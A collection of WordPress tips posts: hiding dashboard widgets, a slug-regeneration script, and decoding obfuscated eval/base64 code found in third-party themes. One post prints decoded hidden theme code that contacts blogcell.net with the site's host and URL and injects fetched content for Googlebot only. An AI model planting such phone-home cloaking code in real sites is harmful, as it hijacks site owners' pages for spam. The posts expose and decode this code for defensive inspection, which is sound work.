A chronological documentation test project, nothing serious, really!

28 Mar 2011 How to Remove Dashboard widgets in WordPress

This is a quick way to remove dashboard widgets in WordPress. These are some of the widgets I hide on one of my WordPress installations by adding these lines to the theme functions.php file. To hide other widgets, view the source code for the Dashboard and search for their label value.

add_action('admin_init', 'rw_remove_dashboard_widgets');
function rw_remove_dashboard_widgets() {
 //remove_meta_box('dashboard_right_now', 'dashboard', 'normal');   // right now
 remove_meta_box('dashboard_recent_comments', 'dashboard', 'normal'); // recent comments
 remove_meta_box('dashboard_incoming_links', 'dashboard', 'normal');  // incoming links
 remove_meta_box('dashboard_plugins', 'dashboard', 'normal');   // plugins
 remove_meta_box('dashboard_quick_press', 'dashboard', 'normal');  // quick press
 remove_meta_box('dashboard_recent_drafts', 'dashboard', 'normal');  // recent drafts
 remove_meta_box('gbworld_dashboard_widget', 'dashboard', 'normal'); // your blog-activity
 remove_meta_box('blogplay_db_widget', 'dashboard', 'normal'); // blogplay.com widget
 remove_meta_box('dashboard_primary', 'dashboard', 'normal');   // wordpress blog
 remove_meta_box('dashboard_secondary', 'dashboard', 'normal');   // other wordpress news
 remove_meta_box('yoast_db_widget', 'dashboard', 'normal'); //yoast widget
}


24 Jan 2011 Easy way to decode or decrypt eval gzinflate str_rot13 base64_decode variables

If you download and install many WordPress themes you will sometimes find themes that have encrypted lines or variables in the footer part of the theme, in the functions.php file or other included theme files.
I do not trust these lines of code and would not use a theme without knowing what code is being run. Therefore I decode these lines to determine if this is a theme I would like to use or just delete the theme because it contains dangerous code. Most of the time these encrypted lines just contain copyright information the authors of the theme don’t want you to change.

This is an example of what an encrypted variable might look like

echo(str_rot13('shapgvba purpx_urnqre(){vs(!(shapgvba_rkvfgf("purpx_shapgvbaf")&&shapgvba_rkvfgf("purpx_s_sbbgre"))){rpub (\'Guvf gurzr vf eryrnfrq haqre perngvir pbzzbaf yvprapr, nyy yvaxf va gur sbbgre fubhyq erznva vagnpg< /sbag>< /o>\');}}'));


The easy way to show the contents of this variable is to copy the entire line into a new PHP file, replace the eval command with echo, and save the file as decode.php

Then you run the PHP file like this

# php decode.php

The result in this example should be

function check_header(){if(!(function_exists("check_functions")&&function_exists("check_f_footer"))){echo (' < b>< font color=white size=4>This theme is released under creative commons licence, all links in the footer should remain intact< /font>');}}

I have included an image of the code in case it is not shown correctly in WordPress.
Wordpress eval result

I have written about this topic before, WordPress themes with eval and base64_decode lines but this is a much simpler way of showing the content of the unreadable variables.


15 Nov 2010 PHP script to recreate empty WordPress post slugs

This post describes how I managed to recreate empty WordPress 3.0 permalink post slugs with the post title of the blog posts using a slightly modified version of the script found on another blog post named Bulk update post slugs in a wordpress blog. This script came in handy since some of my post slugs were missing permalink content because the content in my WordPress blog was migrated from an old PostNuke blog and was not SEO friendly.

The only changes I made to the script were to use the PHP function rawurlencode() to encode the Norwegian letters æøå into URL-friendly form and to change the formatting of how the changes were presented to the web browser. It is very important that you remember to make a backup of your WordPress database before you run this script, just in case you need to revert your post slug changes.

The script

// change this to strip old slugs if needed:
//update wp_posts set post_name = '' where guid like '%.asp'
set_time_limit(20000);

/** Loads the WordPress Environment and Template, allowing wp functions like the_title() */
define('WP_USE_THEMES', false);
require('./wp-blog-header.php');

function bleach($which)
{
    $result = sanitize_title(get_the_title($which));
    return $result;
}

$dbhost = 'localhost';
$dbuser = 'username';
$dbpass = 'password';
$dbname = 'wordpress';

$sql = 'SELECT ID, post_title' . ' FROM `wp_posts`' . ' WHERE post_status = "publish"' . " and post_name = '' " . ' order by ID asc';

$db = mysql_connect($dbhost, $dbuser, $dbpass) or die('Could not connect: ' . mysql_error());
mysql_select_db($dbname);

$result = mysql_query($sql) or die('Query failed: ' . mysql_error());
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
    $id         = $row['ID'];
    $title      = $row['post_title'];
    $clean_slug = rawurlencode(bleach($id));

    echo "ID:{$row['ID']} post_title : {$title} sanitized : {$clean_slug}\n";
    $sql_u = "UPDATE `wp_posts` SET post_name = '" . $clean_slug . "' " . 'WHERE ID = ' . $id;
    echo 'QUERY:' . $sql_u . "\n";
    mysql_query($sql_u) or die('ERROR: ' . mysql_error());
    flush();
}
echo "";
mysql_close($db);

Save this PHP script in the root path of your WordPress installation. In my case I named it “regenerate_post_slugs.php” and ran it from my web browser by visiting the web address http://example.com/regenerate_post_slugs.php. Remember to add the <?php and ?> PHP tags at the beginning and end of the script.
The changes the script makes to your WordPress database will be printed in your web browser's window. If the changes do not meet your post slug wishes, just revert to the backup you made before running this script.

This is an excerpt from the result after running the script on my WordPress database

...
ID:1273 post_title : Presentasjon av spillere og kampoversikt klart! sanitized : presentasjon-av-spillere-og-kampoversikt-klart
QUERY:UPDATE `wp_posts` SET post_name = 'presentasjon-av-spillere-og-kampoversikt-klart' WHERE ID = 1273
ID:1274 post_title : Problemer på hjemmesiden! sanitized : problemer-pa-hjemmesiden
QUERY:UPDATE `wp_posts` SET post_name = 'problemer-pa-hjemmesiden' WHERE ID = 1274
...

You can download the script regenerate_post_slugs.php if you experience that some of the content is missing. Remember to rename it to .php


22 May 2009 WordPress themes with eval and base64_decode lines

Lately I’ve been downloading and reading up on WordPress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1

eval(base64_decode('abcdefgh....')

and other variations like
Example 2

eval(gzinflate(str_rot13(base64_decode('abcdefgh...')

This made me curious about why someone would make such an effort to obfuscate their code. Personally I would like to know what code my themes are running, so it was not an option not to decode these eval lines in my WordPress themes. This made me wonder whether many of my themes had these lines of code, and a simple command run from the console in the wp-content/themes directory of your WordPress installation would reveal all the themes that had encoded code

grep -R eval * | grep decode | grep php

I had several themes containing code for hiding code, and some of the themes had hacks that redirected traffic to other sites.

Decoding Example 1 can be performed by using the following script and inserting the encrypted text in variable $a.

The PHP decoder script
The encrypted text is taken from an unnamed random theme I have downloaded.

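<?php
// Paste the complete encoded line from the theme here (placeholder, not real data).
$a = 'PASTE_ENCODED_LINE_HERE';
function a($a){ return base64_decode($a);}
$b = false;   // becomes true once no eval( wrapper is left
$count = 0;   // number of layers decoded so far
while(!$b){
        // Always decode the first layer, then continue while the result starts with eval
        if(substr($a,0,4) == 'eval' || !$count){
                $a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a));
                $count++;
        }else
                $b = true;
}
echo $a;
?>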

To run it from a console window you can do the following. Do not run it as a privileged user, in case it does something nasty.

php scriptname.php > result.txt

My text would output the following text to the result.txt file

function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt);
else{$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net';
$adwb_get  = '/wpam/';$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
preg_match('/(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp);
if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' HERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1];
}
} 
add_action("wp_footer", "wp_get_footer_meta");

You should then decide if the decoded code is something you would like to run on your WordPress site. Some themes do this to hide their WordPress theme tricks, while others do it to do nasty stuff like redirecting traffic from your site to other sites, etc.

Source: The decoder script was found here
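
An added example (not code from these posts or from the decoder script's source): the same layer peeling done statically in Python, so the suspect line is never handed to a PHP interpreter. It covers the wrapper shapes of Example 1, Example 2 and the str_rot13 line from the 24 Jan 2011 post; `peel`, `build_sample` and the sample payload are names and data constructed for this illustration.

```python
import base64
import re
import zlib

# Added example: peel eval()/echo() wrappers statically, without running PHP.
ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm")

# Python equivalents of the PHP functions named in the posts.
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda b: b.translate(ROT13),
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE stream
}

# Shape: eval( f1( f2( ... 'single-quoted literal' ))));  echo is accepted too.
WRAPPER = re.compile(
    rb"^\s*(?:eval|echo)\s*\(\s*((?:\w+\s*\(\s*)*)'((?:\\.|[^'\\])*)'[\s);]*$",
    re.S)

def peel(code, max_layers=20):
    """Return (innermost_code, functions_applied); never evaluates the input."""
    applied = []
    for _ in range(max_layers):
        m = WRAPPER.match(code)
        names = [n.decode() for n in re.findall(rb"\w+", m.group(1))] if m else []
        if not names or any(n not in DECODERS for n in names):
            break  # plain code or an unknown function: stop for manual review
        data = re.sub(rb"\\(['\\])", rb"\1", m.group(2))  # PHP '...' escapes
        for name in reversed(names):  # the innermost call is applied first
            data = DECODERS[name](data)
            applied.append(name)
        code = data
    return code, applied

def build_sample(payload):
    """Constructed test input: an Example 2 line wrapped inside Example 1."""
    deflater = zlib.compressobj(wbits=-15)
    raw = deflater.compress(payload) + deflater.flush()
    inner = b"eval(gzinflate(str_rot13(base64_decode('%s'))));" % base64.b64encode(
        raw.translate(ROT13))
    return b"eval(base64_decode('%s'));" % base64.b64encode(inner)

if __name__ == "__main__":
    decoded, chain = peel(build_sample(b"function demo_footer(){ return 1; }"))
    print(" -> ".join(chain), decoded.decode("utf-8", "replace"), sep="\n")
```

The loop stops at the first layer it does not recognise and returns what it has, so anything using a function outside the three above still needs a manual look.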


10 Apr 2008 The Highlight Source Pro WordPress plugin is installed

I’ve now installed the Highlight Source Pro plugin for my WordPress installation to see if this is something that will make scripts and code snippets better to view and work with.
